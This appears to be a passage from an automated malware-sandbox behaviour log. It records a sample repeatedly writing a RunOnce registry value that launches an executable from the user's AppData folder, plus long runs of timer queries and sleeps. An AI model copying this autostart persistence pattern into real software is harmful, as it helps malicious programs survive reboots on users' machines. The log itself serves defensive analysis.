| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce, value_name = shwlwook, data = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 40, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
|
For performance reasons, the remaining 1745 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Thread 0xbec
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Thread 0xe5c
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 |
Thread 0xfc8
2
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xbfc
161
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Performance Ctr, time = 25581336016 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25581360392 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25581387852 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25582817913 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25582843214 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25585904170 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25585931256 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591237530 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591262534 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591281828 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25591306175 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25593726483 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25593750704 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25596852899 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25596880812 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25598536860 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25598565705 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25601533840 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25601557989 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25605303282 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25605337153 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25606230885 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25606259312 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25609387821 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25609399881 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25610901933 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25610914310 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25614054547 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25614065885 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25615833460 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25615851726 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25618773073 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25618787805 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25620291031 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25620303953 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25623436446 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25623448830 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25626539051 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25626552250 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25629681913 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25629693357 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25633854115 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25633870597 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25635955450 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25635970522 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25639051360 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25639067674 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25642183712 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25642195918 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643728053 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25643743436 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25646911621 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25646922803 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25649962523 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25649974439 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25651574965 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25651586200 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25655566538 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25655578911 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25656251150 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25656265153 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25659333879 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25659348697 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25660947500 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25660962437 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25664051571 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25664193816 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25665636610 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25665651665 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25668725227 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25668741332 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25693237888 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25693252792 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25695280443 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25695292467 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25696875315 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25696888000 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25701123387 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25701139314 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25703182034 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25703196254 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25706569942 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25706582500 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25709393366 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25709405329 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717253453 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717266847 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717344933 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717356779 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25718722122 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25718736091 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25720375683 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25720392250 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25723420998 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25723437646 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25727335941 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25727347869 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729670292 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25729682142 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25731774506 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25731795848 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25734356345 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25734376365 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25735936528 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25735947963 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25739034347 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25739048418 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25740631052 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25740643438 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25742157737 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25742171182 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25769453109 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25769466795 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25771836200 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25771849837 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25773449018 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25773461534 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776529059 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25776541903 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25780487891 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25780519225 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784643900 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784678915 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784775339 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25784809567 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25787473762 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25787508531 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25790630621 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25790664824 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25792166702 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25792198674 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795341438 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25795372423 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25796839853 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25796871749 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800080287 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800110682 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25803104444 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25803136489 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25805421943 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25805455643 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25807885260 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25807897640 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25810940683 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25810953376 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25814057104 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25814073594 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25815611766 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25815628449 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25818706073 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25818722271 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25822032418 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25822049365 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25825930248 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25825955677 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25828714540 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25828749978 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25831872696 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x8f4
10
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshtml.dll, base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25578413713 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25578427659 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25592127915 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25717379525 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25778009669 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25787574448 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25800139188 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25820169149 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 25830993686 |
|
1 |
Thread 0x4b8
225
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\jscript9.dll, base_address = 0x716a0000 |
|
1 | |
| System | Get Time | type = Ticks, time = 259046 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:32 (UTC) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 259078 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 260000 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 260187 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 260515 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 260578 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 260734 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 260859 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 261218 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 261281 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 261343 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 261750 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 261828 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 261953 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 262015 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 262343 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 262609 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 262671 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 262984 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 263500 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 263546 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 263562 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 263593 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 264109 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 264218 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 264515 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 264843 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 265156 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 265218 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 265234 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 265500 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 265609 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 265968 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 266031 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 266093 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 266562 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 266656 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 266765 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 266843 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 267187 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 267406 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 267531 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 267812 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 268328 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 268421 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 268437 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 268468 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 269625 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 269734 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 269937 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 270203 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 270500 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 270593 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 270828 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 271031 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 272156 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 272234 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 272421 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 273265 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 273375 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 273484 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 273531 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 273578 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 273906 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 279078 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Time | type = Ticks, time = 279718 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 280156 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 280531 |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 280625 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
2 | |
| System | Get Time | type = Ticks, time = 281296 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
